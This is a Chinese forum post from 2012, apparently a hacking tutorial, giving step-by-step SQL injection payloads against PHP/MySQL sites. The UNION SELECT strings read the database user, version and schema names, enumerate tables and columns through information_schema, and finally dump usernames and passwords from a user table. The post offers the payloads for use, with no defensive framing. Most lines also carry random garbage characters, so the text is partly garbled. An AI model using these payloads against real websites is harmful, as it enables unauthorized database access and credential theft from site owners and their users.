7 y0 p( N6 f& X. F" [9 s
教程内容:Mysql 5+php 注入9 j1 W+ T% G8 P3 x
5 }' f! L* S2 y/ K. d+ E6 u
* c2 ^) Z3 B: }/ ?* u; y+ Y' O
6 n; r7 C6 R* F" B一.查看MYSQL基本信息(库名,版本,用户)7 g& o2 @, [$ ]3 a& m' Y
: j) Z/ x) t- o s9 uand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*& ^# F$ t! U8 q' r0 C
6 R1 P! S! K; s( ~; f
二.查数据库/ D) X6 l6 K; i* ]) v
: U. c- l( n8 k# A* vand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
0 G, G6 ^- W, l# c1 A2 n! blimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
! h1 r$ d6 |7 l2 {
9 k! R2 ?' z& n& }, W; a' b三.暴表 T1 \' P; c8 } h. E( ]7 @% w' a
. W; p0 c4 z0 a# B3 m% w1 Gand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
7 y# o* e% Y/ |
. R r5 d% N8 S1 }# Z9 plimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。" C( b9 U N7 d2 M
# T% ]" E9 D7 g* n5 ^ J0 V% I
四.暴字段8 R! z% b2 B! Q
& i+ r- [8 l. Z+ y; C" D: I
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*; j# |9 F5 Z; {! |+ l
& |2 H0 y/ y+ slimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
/ b, p1 G+ R& d+ Y) ]2 b
4 ~: n" V. z- k" {五.暴数据) f0 J* g9 @: `: o
$ H1 a, p$ u3 kand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
, d H3 I q4 C0 W' z, {8 A
5 Q8 [0 o. H, J' N. G
4 D. {/ y$ c) T% m9 b5 Z# B! L这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
8 R* L6 @9 R3 e2 | |
发表于 2012-9-13 16:27:53
收藏
支持
反对